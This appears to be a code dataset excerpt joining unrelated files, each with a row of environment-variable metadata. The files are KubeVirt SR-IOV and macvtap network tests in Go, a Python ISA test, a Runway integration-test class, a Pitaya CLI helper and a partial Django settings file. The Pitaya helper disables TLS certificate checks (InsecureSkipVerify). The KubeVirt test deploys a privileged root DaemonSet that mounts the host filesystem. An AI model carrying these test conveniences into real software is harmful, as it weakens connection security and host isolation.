By("checking virtual machine instance has an interface with the requested MAC address")
Expect(checkMacAddress(vmi, interfaceName, mac)).To(Succeed())
By("checking virtual machine instance reports the expected network name")
Expect(getInterfaceNetworkNameByMAC(vmi, mac)).To(Equal(sriovnet1))
})
It("[test_id:1755]should create a virtual machine with two sriov interfaces referring the same resource", func() {
sriovNetworks := []string{sriovnet1, sriovnet2}
vmi := getSriovVmi(sriovNetworks, defaultCloudInitNetworkData())
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
By("checking KUBEVIRT_RESOURCE_NAME_<networkName> variables are defined in pod")
vmiPod := tests.GetRunningPodByVirtualMachineInstance(vmi, vmi.Namespace)
for _, name := range sriovNetworks {
Expect(validatePodKubevirtResourceName(virtClient, vmiPod, name, sriovResourceName)).To(Succeed())
}
checkDefaultInterfaceInPod(vmi)
By("checking virtual machine instance has three interfaces")
checkInterfacesInGuest(vmi, []string{"eth0", "eth1", "eth2"})
// there is little we can do beyond just checking three devices are present: PCI slots are different inside
// the guest, and DP doesn't pass information about vendor IDs of allocated devices into the pod, so
// it's hard to match them.
})
// createSriovVMs instantiates two VMs connected through SR-IOV.
// Note: test case assumes interconnectivity between SR-IOV
// interfaces. It can be achieved either by configuring the external switch
// properly, or via in-PF switching for VFs (works for some NIC models)
createSriovVMs := func(networkNameA, networkNameB, cidrA, cidrB string) (*v1.VirtualMachineInstance, *v1.VirtualMachineInstance) {
// Explicitly choose different random mac addresses instead of relying on kubemacpool to do it:
// 1) we don't at the moment deploy kubemacpool in kind providers
// 2) even if we would do, it's probably a good idea to have the suite not depend on this fact
//
// This step is needed to guarantee that no VFs on the PF carry a duplicate MAC address that may affect
// ability of VMIs to send and receive ICMP packets on their ports.
mac1, err := tests.GenerateRandomMac()
Expect(err).ToNot(HaveOccurred())
mac2, err := tests.GenerateRandomMac()
Expect(err).ToNot(HaveOccurred())
// start peer machines with sriov interfaces from the same resource pool
// manually configure IP/link on sriov interfaces because there is
// no DHCP server to serve the address to the guest
vmi1 := getSriovVmi([]string{networkNameA}, cloudInitNetworkDataWithStaticIPsByMac(networkNameA, mac1.String(), cidrA))
vmi2 := getSriovVmi([]string{networkNameB}, cloudInitNetworkDataWithStaticIPsByMac(networkNameB, mac2.String(), cidrB))
vmi1.Spec.Domain.Devices.Interfaces[1].MacAddress = mac1.String()
vmi2.Spec.Domain.Devices.Interfaces[1].MacAddress = mac2.String()
vmi1 = startVmi(vmi1)
vmi2 = startVmi(vmi2)
vmi1 = waitVmi(vmi1)
vmi2 = waitVmi(vmi2)
vmi1, err = virtClient.VirtualMachineInstance(vmi1.Namespace).Get(vmi1.Name, &metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
vmi2, err = virtClient.VirtualMachineInstance(vmi2.Namespace).Get(vmi2.Name, &metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
return vmi1, vmi2
}
It("[test_id:3956]should connect to another machine with sriov interface over IPv4", func() {
cidrA := "192.168.1.1/24"
cidrB := "192.168.1.2/24"
ipA, err := cidrToIP(cidrA)
Expect(err).ToNot(HaveOccurred())
ipB, err := cidrToIP(cidrB)
Expect(err).ToNot(HaveOccurred())
//create two vms on the same sriov network
vmi1, vmi2 := createSriovVMs(sriovnet3, sriovnet3, cidrA, cidrB)
Eventually(func() error {
return libnet.PingFromVMConsole(vmi1, ipB)
}, 15*time.Second, time.Second).Should(Succeed())
Eventually(func() error {
return libnet.PingFromVMConsole(vmi2, ipA)
}, 15*time.Second, time.Second).Should(Succeed())
})
It("[test_id:3957]should connect to another machine with sriov interface over IPv6", func() {
vmi1CIDR := "fc00::1/64"
vmi2CIDR := "fc00::2/64"
vmi1IP, err := cidrToIP(vmi1CIDR)
Expect(err).ToNot(HaveOccurred())
vmi2IP, err := cidrToIP(vmi2CIDR)
Expect(err).ToNot(HaveOccurred())
//create two vms on the same sriov network
vmi1, vmi2 := createSriovVMs(sriovnet3, sriovnet3, vmi1CIDR, vmi2CIDR)
Eventually(func() error {
return libnet.PingFromVMConsole(vmi1, vmi2IP)
}, 15*time.Second, time.Second).Should(Succeed())
Eventually(func() error {
return libnet.PingFromVMConsole(vmi2, vmi1IP)
}, 15*time.Second, time.Second).Should(Succeed())
})
Context("With VLAN", func() {
const (
cidrVlaned1 = "192.168.0.1/24"
sriovVlanNetworkName = "sriov-vlan"
)
var ipVlaned1 string
BeforeEach(func() {
var err error
ipVlaned1, err = cidrToIP(cidrVlaned1)
Expect(err).ToNot(HaveOccurred())
createNetworkAttachementDefinition(sriovVlanNetworkName, tests.NamespaceTestDefault, sriovConfVlanCRD)
})
It("should be able to ping between two VMIs with the same VLAN over SRIOV network", func() {
_, vlanedVMI2 := createSriovVMs(sriovVlanNetworkName, sriovVlanNetworkName, cidrVlaned1, "192.168.0.2/24")
By("pinging from vlanedVMI2 and the anonymous vmi over vlan")
Eventually(func() error {
return libnet.PingFromVMConsole(vlanedVMI2, ipVlaned1)
}, 15*time.Second, time.Second).ShouldNot(HaveOccurred())
})
It("should NOT be able to ping between Vlaned VMI and a non Vlaned VMI", func() {
_, nonVlanedVMI := createSriovVMs(sriovVlanNetworkName, sriovnet3, cidrVlaned1, "192.168.0.3/24")
By("pinging between nonVlanedVMIand the anonymous vmi")
Eventually(func() error {
return libnet.PingFromVMConsole(nonVlanedVMI, ipVlaned1)
}, 15*time.Second, time.Second).Should(HaveOccurred())
})
})
Context("migration", func() {
BeforeEach(func() {
if err := validateSRIOVSetup(virtClient, sriovResourceName, 2); err != nil {
Skip("Migration tests require at least 2 nodes: " + err.Error())
}
})
BeforeEach(func() {
tests.EnableFeatureGate(virtconfig.SRIOVLiveMigrationGate)
})
AfterEach(func() {
tests.DisableFeatureGate(virtconfig.SRIOVLiveMigrationGate)
})
var vmi *v1.VirtualMachineInstance
var interfaceName string
const mac = "de:ad:00:00:be:ef"
BeforeEach(func() {
// The SR-IOV VF MAC should be preserved on migration, therefore explicitly specify it.
vmi = getSriovVmi([]string{sriovnet1}, defaultCloudInitNetworkData())
vmi.Spec.Domain.Devices.Interfaces[1].MacAddress = mac
vmi = startVmi(vmi)
vmi = waitVmi(vmi)
// It may take some time for the VMI interface status to be updated with the information reported by
// the guest-agent.
Eventually(func() error {
var err error
vmi, err = virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.Name, &metav1.GetOptions{})
Expect(err).NotTo(HaveOccurred())
interfaceName, err = getInterfaceNameByMAC(vmi, mac)
return err
}, 30*time.Second, 5*time.Second).Should(Succeed())
Expect(checkMacAddress(vmi, interfaceName, mac)).To(Succeed(), "SR-IOV VF is expected to exist in the guest")
})
It("should be successful with a running VMI on the target", func() {
By("starting the migration")
migration := tests.NewRandomMigration(vmi.Name, vmi.Namespace)
migrationUID := tests.RunMigrationAndExpectCompletion(virtClient, migration, tests.MigrationWaitTime)
tests.ConfirmVMIPostMigration(virtClient, vmi, migrationUID)
Expect(checkMacAddress(vmi, interfaceName, mac)).To(Succeed(),
"SR-IOV VF is expected to exist in the guest after migration")
})
})
})
})
var _ = SIGDescribe("[Serial]Macvtap", func() {
var err error
var virtClient kubecli.KubevirtClient
var macvtapLowerDevice string
var macvtapNetworkName string
BeforeEach(func() {
virtClient, err = kubecli.GetKubevirtClient()
tests.PanicOnError(err)
macvtapLowerDevice = "eth0"
macvtapNetworkName = "net1"
// cleanup the environment
tests.BeforeTestCleanup()
})
BeforeEach(func() {
tests.EnableFeatureGate(virtconfig.MacvtapGate)
})
BeforeEach(func() {
result := virtClient.RestClient().
Post().
RequestURI(fmt.Sprintf(postUrl, tests.NamespaceTestDefault, macvtapNetworkName)).
Body([]byte(fmt.Sprintf(macvtapNetworkConf, macvtapNetworkName, tests.NamespaceTestDefault, macvtapLowerDevice, macvtapNetworkName))).
Do(context.Background())
Expect(result.Error()).NotTo(HaveOccurred(), "A macvtap network named %s should be provisioned", macvtapNetworkName)
})
AfterEach(func() {
tests.DisableFeatureGate(virtconfig.MacvtapGate)
})
newCirrosVMIWithMacvtapNetwork := func(macvtapNetworkName string) *v1.VirtualMachineInstance {
return libvmi.NewCirros(
libvmi.WithInterface(
*v1.DefaultMacvtapNetworkInterface(macvtapNetworkName)),
libvmi.WithNetwork(libvmi.MultusNetwork(macvtapNetworkName)))
}
newCirrosVMIWithExplicitMac := func(macvtapNetworkName string, mac string) *v1.VirtualMachineInstance {
return libvmi.NewCirros(
libvmi.WithInterface(
*libvmi.InterfaceWithMac(
v1.DefaultMacvtapNetworkInterface(macvtapNetworkName), mac)),
libvmi.WithNetwork(libvmi.MultusNetwork(macvtapNetworkName)))
}
newFedoraVMIWithExplicitMacAndGuestAgent := func(macvtapNetworkName string, mac string) *v1.VirtualMachineInstance {
return libvmi.NewTestToolingFedora(
libvmi.WithInterface(libvmi.InterfaceDeviceWithMasqueradeBinding()),
libvmi.WithInterface(
*libvmi.InterfaceWithMac(
v1.DefaultMacvtapNetworkInterface(macvtapNetworkName), mac)),
libvmi.WithNetwork(v1.DefaultPodNetwork()),
libvmi.WithCloudInitNoCloudUserData(tests.GetFedoraToolsGuestAgentUserData(), false),
libvmi.WithNetwork(libvmi.MultusNetwork(macvtapNetworkName)))
}
createCirrosVMIStaticIPOnNode := func(nodeName string, networkName string, ifaceName string, ipCIDR string, mac *string) *v1.VirtualMachineInstance {
var vmi *v1.VirtualMachineInstance
if mac != nil {
vmi = newCirrosVMIWithExplicitMac(networkName, *mac)
} else {
vmi = newCirrosVMIWithMacvtapNetwork(networkName)
}
vmi = tests.WaitUntilVMIReady(
tests.StartVmOnNode(vmi, nodeName),
console.LoginToCirros)
// configure the client VMI
Expect(configVMIInterfaceWithSudo(vmi, ifaceName, ipCIDR)).To(Succeed())
return vmi
}
createCirrosVMIRandomNode := func(networkName string, mac string) (*v1.VirtualMachineInstance, error) {
runningVMI := tests.RunVMIAndExpectLaunchWithIgnoreWarningArg(
newCirrosVMIWithExplicitMac(networkName, mac),
180,
false)
err := console.LoginToCirros(runningVMI)
return runningVMI, err
}
createFedoraVMIRandomNode := func(networkName string, mac string) (*v1.VirtualMachineInstance, error) {
runningVMI := tests.RunVMIAndExpectLaunchWithIgnoreWarningArg(
newFedoraVMIWithExplicitMacAndGuestAgent(networkName, mac),
180,
false)
err := console.LoginToFedora(runningVMI)
return runningVMI, err
}
Context("a virtual machine with one macvtap interface, with a custom MAC address", func() {
var serverVMI *v1.VirtualMachineInstance
var chosenMAC string
var nodeList *k8sv1.NodeList
var nodeName string
var serverIP string
BeforeEach(func() {
nodeList = tests.GetAllSchedulableNodes(virtClient)
Expect(nodeList.Items).NotTo(BeEmpty(), "schedulable kubernetes nodes must be present")
nodeName = nodeList.Items[0].Name
chosenMAC = "de:ad:00:00:be:af"
serverCIDR := "192.0.2.102/24"
var err error
serverIP, err = cidrToIP(serverCIDR)
Expect(err).ToNot(HaveOccurred())
serverVMI = createCirrosVMIStaticIPOnNode(nodeName, macvtapNetworkName, "eth0", serverCIDR, &chosenMAC)
})
It("should have the specified MAC address reported back via the API", func() {
Expect(len(serverVMI.Status.Interfaces)).To(Equal(1), "should have a single interface")
Expect(serverVMI.Status.Interfaces[0].MAC).To(Equal(chosenMAC), "the expected MAC address should be set in the VMI")
})
Context("and another virtual machine connected to the same network", func() {
var clientVMI *v1.VirtualMachineInstance
BeforeEach(func() {
clientVMI = createCirrosVMIStaticIPOnNode(nodeName, macvtapNetworkName, "eth0", "192.0.2.101/24", nil)
})
It("can communicate with the virtual machine in the same network", func() {
Expect(libnet.PingFromVMConsole(clientVMI, serverIP)).To(Succeed())
})
})
})
Context("VMI migration", func() {
var clientVMI *v1.VirtualMachineInstance
BeforeEach(func() {
tests.SkipIfMigrationIsNotPossible()
})
BeforeEach(func() {
macAddress := "02:03:04:05:06:07"
clientVMI, err = createCirrosVMIRandomNode(macvtapNetworkName, macAddress)
Expect(err).NotTo(HaveOccurred(), "must succeed creating a VMI on a random node")
})
It("should be successful when the VMI MAC address is defined in its spec", func() {
By("starting the migration")
migration := tests.NewRandomMigration(clientVMI.Name, clientVMI.Namespace)
migrationUID := tests.RunMigrationAndExpectCompletion(virtClient, migration, tests.MigrationWaitTime)
// check VMI, confirm migration state
tests.ConfirmVMIPostMigration(virtClient, clientVMI, migrationUID)
})
Context("with live traffic", func() {
var serverVMI *v1.VirtualMachineInstance
var serverIP string
getVMMacvtapIfaceIP := func(vmi *v1.VirtualMachineInstance, macAddress string) (string, error) {
var vmiIP string
err := wait.PollImmediate(time.Second, 2*time.Minute, func() (done bool, err error) {
vmi, err := virtClient.VirtualMachineInstance(vmi.Namespace).Get(vmi.Name, &v13.GetOptions{})
if err != nil {
return false, err
}
for _, iface := range vmi.Status.Interfaces {
if iface.MAC == macAddress {
vmiIP = iface.IP
return true, nil
}
}
return false, nil
})
if err != nil {
return "", err
}
return vmiIP, nil
}
BeforeEach(func() {
macAddress := "02:03:04:05:06:aa"
serverVMI, err = createFedoraVMIRandomNode(macvtapNetworkName, macAddress)
Expect(err).NotTo(HaveOccurred(), "must have succeeded creating a fedora VMI on a random node")
Expect(serverVMI.Status.Interfaces).NotTo(BeEmpty(), "a migrate-able VMI must have network interfaces")
serverIP, err = getVMMacvtapIfaceIP(serverVMI, macAddress)
Expect(err).NotTo(HaveOccurred(), "should have managed to figure out the IP of the server VMI")
})
BeforeEach(func() {
Expect(libnet.PingFromVMConsole(clientVMI, serverIP)).To(Succeed(), "connectivity is expected *before* migrating the VMI")
})
It("should keep connectivity after a migration", func() {
migration := tests.NewRandomMigration(serverVMI.Name, serverVMI.GetNamespace())
_ = tests.RunMigrationAndExpectCompletion(virtClient, migration, tests.MigrationWaitTime)
Expect(libnet.PingFromVMConsole(clientVMI, serverIP)).To(Succeed(), "connectivity is expected *after* migrating the VMI")
})
})
})
})
func cidrToIP(cidr string) (string, error) {
ip, _, err := net.ParseCIDR(cidr)
if err != nil {
return "", err
}
return ip.String(), nil
}
func configVMIInterfaceWithSudo(vmi *v1.VirtualMachineInstance, interfaceName, interfaceAddress string) error {
return configInterface(vmi, interfaceName, interfaceAddress, "sudo ")
}
func configInterface(vmi *v1.VirtualMachineInstance, interfaceName, interfaceAddress string, userModifierPrefix ...string) error {
setStaticIpCmd := fmt.Sprintf("%sip addr add %s dev %s\n", strings.Join(userModifierPrefix, " "), interfaceAddress, interfaceName)
err := runSafeCommand(vmi, setStaticIpCmd)
if err != nil {
return fmt.Errorf("could not configure address %s for interface %s on VMI %s: %w", interfaceAddress, interfaceName, vmi.Name, err)
}
return setInterfaceUp(vmi, interfaceName)
}
func checkInterface(vmi *v1.VirtualMachineInstance, interfaceName string) error {
cmdCheck := fmt.Sprintf("ip link show %s\n", interfaceName)
err := runSafeCommand(vmi, cmdCheck)
if err != nil {
return fmt.Errorf("could not check interface: interface %s was not found in the VMI %s: %w", interfaceName, vmi.Name, err)
}
return nil
}
func checkMacAddress(vmi *v1.VirtualMachineInstance, interfaceName, macAddress string) error {
cmdCheck := fmt.Sprintf("ip link show %s\n", interfaceName)
err := console.SafeExpectBatch(vmi, []expect.Batcher{
&expect.BSnd{S: "\n"},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: cmdCheck},
&expect.BExp{R: macAddress},
&expect.BSnd{S: "echo $?\n"},
&expect.BExp{R: console.RetValue("0")},
}, 15)
if err != nil {
return fmt.Errorf("could not check mac address of interface %s: MAC %s was not found in the VMI %s: %w", interfaceName, macAddress, vmi.Name, err)
}
return nil
}
func setInterfaceUp(vmi *v1.VirtualMachineInstance, interfaceName string) error {
setUpCmd := fmt.Sprintf("ip link set %s up\n", interfaceName)
err := runSafeCommand(vmi, setUpCmd)
if err != nil {
return fmt.Errorf("could not set interface %s up on VMI %s: %w", interfaceName, vmi.Name, err)
}
return nil
}
func runSafeCommand(vmi *v1.VirtualMachineInstance, command string) error {
return console.SafeExpectBatch(vmi, []expect.Batcher{
&expect.BSnd{S: "\n"},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: command},
&expect.BExp{R: console.PromptExpression},
&expect.BSnd{S: "echo $?\n"},
&expect.BExp{R: console.RetValue("0")},
}, 15)
}
func getInterfaceNameByMAC(vmi *v1.VirtualMachineInstance, mac string) (string, error) {
for _, iface := range vmi.Status.Interfaces {
if iface.MAC == mac {
return iface.InterfaceName, nil
}
}
return "", fmt.Errorf("could not get sriov interface by MAC: no interface on VMI %s with MAC %s", vmi.Name, mac)
}
func getInterfaceNetworkNameByMAC(vmi *v1.VirtualMachineInstance, macAddress string) string {
for _, iface := range vmi.Status.Interfaces {
if iface.MAC == macAddress {
return iface.Name
}
}
return ""
}
// Tests in Multus suite are expecting a Linux bridge to be available on each node, with iptables allowing
// traffic to go through. This function creates a Daemon Set on the cluster (if not exists yet), this Daemon
// Set creates a linux bridge and configures the firewall. We use iptables-compat in order to work with
// both iptables and newer nftables.
// TODO: Once kubernetes-nmstate is ready, we should use it instead
func configureNodeNetwork(virtClient kubecli.KubevirtClient) {
// Fetching the kubevirt-operator image from the pod makes this independent from the installation method / image used
pods, err := virtClient.CoreV1().Pods(flags.KubeVirtInstallNamespace).List(context.Background(), metav1.ListOptions{LabelSelector: "kubevirt.io=virt-handler"})
Expect(err).ToNot(HaveOccurred())
Expect(pods.Items).ToNot(BeEmpty())
virtHandlerImage := pods.Items[0].Spec.Containers[0].Image
// Privileged DaemonSet configuring host networking as needed
networkConfigDaemonSet := appsv1.DaemonSet{
TypeMeta: metav1.TypeMeta{
APIVersion: "apps/v1",
Kind: "DaemonSet",
},
ObjectMeta: metav1.ObjectMeta{
Name: "network-config",
Namespace: metav1.NamespaceSystem,
},
Spec: appsv1.DaemonSetSpec{
Selector: &metav1.LabelSelector{
MatchLabels: map[string]string{"name": "network-config"},
},
Template: k8sv1.PodTemplateSpec{
ObjectMeta: metav1.ObjectMeta{
Labels: map[string]string{"name": "network-config"},
},
Spec: k8sv1.PodSpec{
Containers: []k8sv1.Container{
{
Name: "network-config",
// Reuse image which is already installed in the cluster. All we need is chroot.
// Local OKD cluster doesn't allow us to pull from the outside.
Image: virtHandlerImage,
Command: []string{
"sh",
"-c",
"set -x; chroot /host ip link add br10 type bridge; chroot /host iptables -I FORWARD 1 -i br10 -j ACCEPT; touch /tmp/ready; sleep INF",
},
SecurityContext: &k8sv1.SecurityContext{
Privileged: pointer.BoolPtr(true),
RunAsUser: pointer.Int64Ptr(0),
},
ReadinessProbe: &k8sv1.Probe{
Handler: k8sv1.Handler{
Exec: &k8sv1.ExecAction{
Command: []string{"cat", "/tmp/ready"},
},
},
},
VolumeMounts: []k8sv1.VolumeMount{
{
Name: "host",
MountPath: "/host",
},
},
},
},
Volumes: []k8sv1.Volume{
{
Name: "host",
VolumeSource: k8sv1.VolumeSource{
HostPath: &k8sv1.HostPathVolumeSource{
Path: "/",
},
},
},
},
HostNetwork: true,
},
},
},
}
// Helper function returning existing network-config DaemonSet if exists
getNetworkConfigDaemonSet := func() *appsv1.DaemonSet {
daemonSet, err := virtClient.AppsV1().DaemonSets(metav1.NamespaceSystem).Get(context.Background(), networkConfigDaemonSet.Name, metav1.GetOptions{})
if errors.IsNotFound(err) {
return nil
}
Expect(err).NotTo(HaveOccurred())
return daemonSet
}
// If the DaemonSet haven't been created yet, do so
runningNetworkConfigDaemonSet := getNetworkConfigDaemonSet()
if runningNetworkConfigDaemonSet == nil {
_, err := virtClient.AppsV1().DaemonSets(metav1.NamespaceSystem).Create(context.Background(), &networkConfigDaemonSet, metav1.CreateOptions{})
Expect(err).NotTo(HaveOccurred())
}
// Make sure that all pods in the Daemon Set finished the configuration
nodes := tests.GetAllSchedulableNodes(virtClient)
Eventually(func() int {
daemonSet := getNetworkConfigDaemonSet()
return int(daemonSet.Status.NumberAvailable)
}, time.Minute, time.Second).Should(Equal(len(nodes.Items)))
}
func validateSRIOVSetup(virtClient kubecli.KubevirtClient, sriovResourceName string, minRequiredNodes int) error {
nodes := tests.GetAllSchedulableNodes(virtClient)
Expect(nodes.Items).ToNot(BeEmpty(), "There should be some compute node")
var sriovEnabledNode int
for _, node := range nodes.Items {
resourceList := node.Status.Allocatable
for k, v := range resourceList {
if string(k) == sriovResourceName {
if v.Value() > 0 {
sriovEnabledNode++
break
}
}
}
}
if sriovEnabledNode < minRequiredNodes {
return fmt.Errorf("not enough compute nodes with SR-IOV support detected")
}
return nil
}
func validatePodKubevirtResourceName(virtClient kubecli.KubevirtClient, vmiPod *k8sv1.Pod, networkName, sriovResourceName string) error {
out, err := tests.ExecuteCommandOnPod(
virtClient,
vmiPod,
"compute",
[]string{"sh", "-c", fmt.Sprintf("echo $KUBEVIRT_RESOURCE_NAME_%s", networkName)},
)
if err != nil {
return err
}
out = strings.TrimSuffix(out, "\n")
if out != sriovResourceName {
return fmt.Errorf("env settings %s didnt match %s", out, sriovResourceName)
}
return nil
}
func defaultCloudInitNetworkData() string {
networkData, err := libnet.CreateDefaultCloudInitNetworkData()
ExpectWithOffset(1, err).ToNot(HaveOccurred(), "should successfully create default cloud init network data for SRIOV")
return networkData
}
func cloudInitNetworkDataWithStaticIPsByMac(nicName, macAddress, ipAddress string) string {
networkData, err := libnet.NewNetworkData(
libnet.WithEthernet(nicName,
libnet.WithAddresses(ipAddress),
libnet.WithNameserverFromCluster(),
libnet.WithMatchingMAC(macAddress),
),
)
ExpectWithOffset(1, err).ToNot(HaveOccurred(), "should successfully create static IPs by mac address cloud init network data")
return networkData
}
func cloudInitNetworkDataWithStaticIPsByDevice(deviceName, ipAddress string) string {
networkData, err := libnet.NewNetworkData(
libnet.WithEthernet(deviceName,
libnet.WithAddresses(ipAddress),
libnet.WithNameserverFromCluster(),
),
)
ExpectWithOffset(1, err).ToNot(HaveOccurred(), "should successfully create static IPs by device name cloud init network data")
return networkData
}
| [
"\"SRIOV_RESOURCE_NAME\""
]
| []
| [
"SRIOV_RESOURCE_NAME"
]
| [] | ["SRIOV_RESOURCE_NAME"] | go | 1 | 0 | |
tests/cpu/test_dyndisp.py | import unittest
import os
import intel_extension_for_pytorch._C as core
def get_ipex_isa_env_setting():
env_isa = os.getenv('ATEN_CPU_CAPABILITY')
return env_isa
def get_currnet_isa_level():
return core._get_current_isa_level().lower()
class TestDynDisp(unittest.TestCase):
def test_env_setting(self):
env_isa = get_ipex_isa_env_setting()
cur_isa = get_currnet_isa_level()
if (env_isa == None):
return
self.assertEqual(env_isa.lower(), cur_isa.lower())
def test_dyndisp_in_supported_set(self):
env_isa = get_ipex_isa_env_setting()
if (env_isa != None):
return
cur_isa = get_currnet_isa_level()
supported_isa_set = ["default", "avx2", "avx512"]
expected_isa = cur_isa in supported_isa_set
self.assertTrue(expected_isa)
if __name__ == '__main__':
unittest.main() | []
| []
| [
"ATEN_CPU_CAPABILITY"
]
| [] | ["ATEN_CPU_CAPABILITY"] | python | 1 | 0 | |
integration_tests/integration_test.py | """Integration test module."""
import errno
import os
import shutil
import subprocess
import sys
from copy import deepcopy
import yaml
from send2trash import send2trash
from runway.util import change_dir
class IntegrationTest(object):
"""Base class for Integration Tests.
Attributes:
REQUIRED_FIXTURE_FILES (List[str]): List of fixture files that
will be copied to the current ``working_dir`` from
``fixture_dir`` when using the ``copy_fixtures`` method.
fixture_dir (str): Path to ``fixture`` directory relative to
``working_dir``.
tests_dir (str): Path to ``tests`` directory relative to
``working_dir``.
working_dir (str): Path that the test is running in.
"""
REQUIRED_FIXTURE_FILES = []
def __init__(self, logger, env_vars=None):
"""Initialize base class."""
self.logger = logger
self.environment = deepcopy(env_vars or os.environ)
self.runway_config_path = None
# roundabout way to get the file path of a subclass
self.working_dir = os.path.abspath(os.path.dirname(
sys.modules[self.__module__].__file__
))
self.fixture_dir = os.path.join(self.working_dir, 'fixtures')
self.tests_dir = os.path.join(self.working_dir, 'tests')
def copy_fixtures(self):
"""Copy fixtures to the root of the tests dir."""
self.logger.info('Fixtures defined for tests: %s',
str(self.REQUIRED_FIXTURE_FILES))
for fixture in self.REQUIRED_FIXTURE_FILES:
src = os.path.join(self.fixture_dir, fixture)
dest = os.path.join(self.working_dir, fixture)
if os.path.isfile(src):
self.logger.info('Copying "%s" to "%s"...', src, dest)
shutil.copy(src, dest)
def cleanup_fixtures(self):
"""Delete copied fixtures."""
for fixture in self.REQUIRED_FIXTURE_FILES:
fixture_path = os.path.join(self.working_dir, fixture)
self.logger.info('Deleting "%s"...', fixture_path)
try:
send2trash(fixture_path)
except OSError as err:
if err.errno == errno.ENOENT or 'not found' in str(err):
continue
raise
def parse_config(self, path):
"""Read and parse yml."""
if not os.path.isfile(path):
self.logger.error("Config file was not found (looking for \"%s\")",
path)
with open(path) as data_file:
return yaml.safe_load(data_file)
def runway_cmd(self, action, env_vars=None, tags=None, timeout=300, *args):
"""Run a deploy command based on tags.
Args:
action (str): Runway action. (e.g. ``deploy``, ``destroy``)
env_vars (Optional[Dict[str, str]]): Can be used to override
environment variables for the invocation.
tags (Optional[List[str]]): List of tag options to pass to Runway.
timeout (int): Seconds to wait for process to complete.
args (str): Additional arguments to add to the command. These
are places after any ``--tag`` options.
Returns:
Tuple[int, str, str]: The return code, ``stdout``, and ``stderr``
of the process.
"""
cmd = ['runway', action]
if tags:
for tag in tags:
cmd.extend(['--tag', tag])
cmd.extend(args)
self.logger.info('Running command: %s', str(cmd))
with change_dir(self.working_dir):
cmd_process = subprocess.Popen(cmd, env=env_vars or self.environment,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = cmd_process.communicate(timeout=timeout)
return cmd_process.returncode, stdout.decode(), stderr.decode()
def set_environment(self, env):
"""Set deploy environment."""
self.logger.info('Setting "DEPLOY_ENVIRONMENT" to "%s"', env)
if isinstance(env, str):
self.environment['DEPLOY_ENVIRONMENT'] = env
def set_env_var(self, var_name, var):
"""Set an environment variable"""
self.logger.info('Setting "%s" to "%s"', var_name, var)
if not isinstance(var, dict):
env = {}
env[var_name] = var
self.environment.update(env)
def unset_env_var(self, var):
self.logger.info('Unsetting "%s" Environment Variable', var)
del self.environment[var]
def run(self):
"""Implement dummy method (set in consuming classes)."""
raise NotImplementedError('You must implement the run() method '
'yourself!')
def teardown(self):
"""Implement dummy method (set in consuming classes)."""
raise NotImplementedError('You must implement the teardown() method '
'yourself!')
| []
| []
| []
| [] | [] | python | 0 | 0 | |
helpers.go | // Copyright (c) TFG Co. All Rights Reserved.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
package main
import (
"crypto/tls"
"encoding/json"
"fmt"
"os"
"github.com/mitchellh/go-homedir"
"github.com/sirupsen/logrus"
"github.com/tutumagi/pitaya/client"
"gopkg.in/abiosoft/ishell.v2"
)
func protoClient(log Log, addr string) error {
log.Println("Using protobuf client")
protoclient := client.NewProto(docsString, logrus.InfoLevel)
pClient = protoclient
for k, v := range pushInfo {
protoclient.AddPushResponse(k, v)
}
if err := protoclient.LoadServerInfo(addr); err != nil {
log.Println("Failed to load server info")
return err
}
return nil
}
func tryConnect(addr string) error {
if err := pClient.ConnectToWS(addr, "", &tls.Config{
InsecureSkipVerify: true,
}); err != nil {
if err := pClient.ConnectToWS(addr, ""); err != nil {
if err := pClient.ConnectTo(addr, &tls.Config{
InsecureSkipVerify: true,
}); err != nil {
if err := pClient.ConnectTo(addr); err != nil {
return err
}
}
}
}
return nil
}
func readServerMessages(callback func(data []byte)) {
channel := pClient.MsgChannel()
for {
select {
case <-disconnectedCh:
close(disconnectedCh)
return
case m := <-channel:
callback(parseData(m.Data))
}
}
}
func configure(c *ishell.Shell) {
historyPath := os.Getenv("PITAYACLI_HISTORY_PATH")
if historyPath == "" {
home, _ := homedir.Dir()
historyPath = fmt.Sprintf("%s/.pitayacli_history", home)
}
c.SetHistoryPath(historyPath)
}
func parseData(data []byte) []byte {
if prettyJSON {
var m interface{}
_ = json.Unmarshal(data, &m)
data, _ = json.MarshalIndent(m, "", "\t")
}
return data
}
| [
"\"PITAYACLI_HISTORY_PATH\""
]
| []
| [
"PITAYACLI_HISTORY_PATH"
]
| [] | ["PITAYACLI_HISTORY_PATH"] | go | 1 | 0 | |
backend/settings.py | """
Django settings for backend project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# .sec is loaded in virtualenv activation. SECRET_KEY is there
SECRET_KEY = os.environ.get("SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
